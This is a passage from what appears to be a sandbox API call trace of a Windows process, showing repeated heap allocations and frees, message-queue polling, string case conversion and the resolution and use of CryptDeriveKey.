returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0162.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.094] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0162.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.094] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.094] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.094] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.095] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.095] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0162.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.096] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0162.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa4a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.099] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0162.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0162.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.100] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0162.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0162.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0162.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0162.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 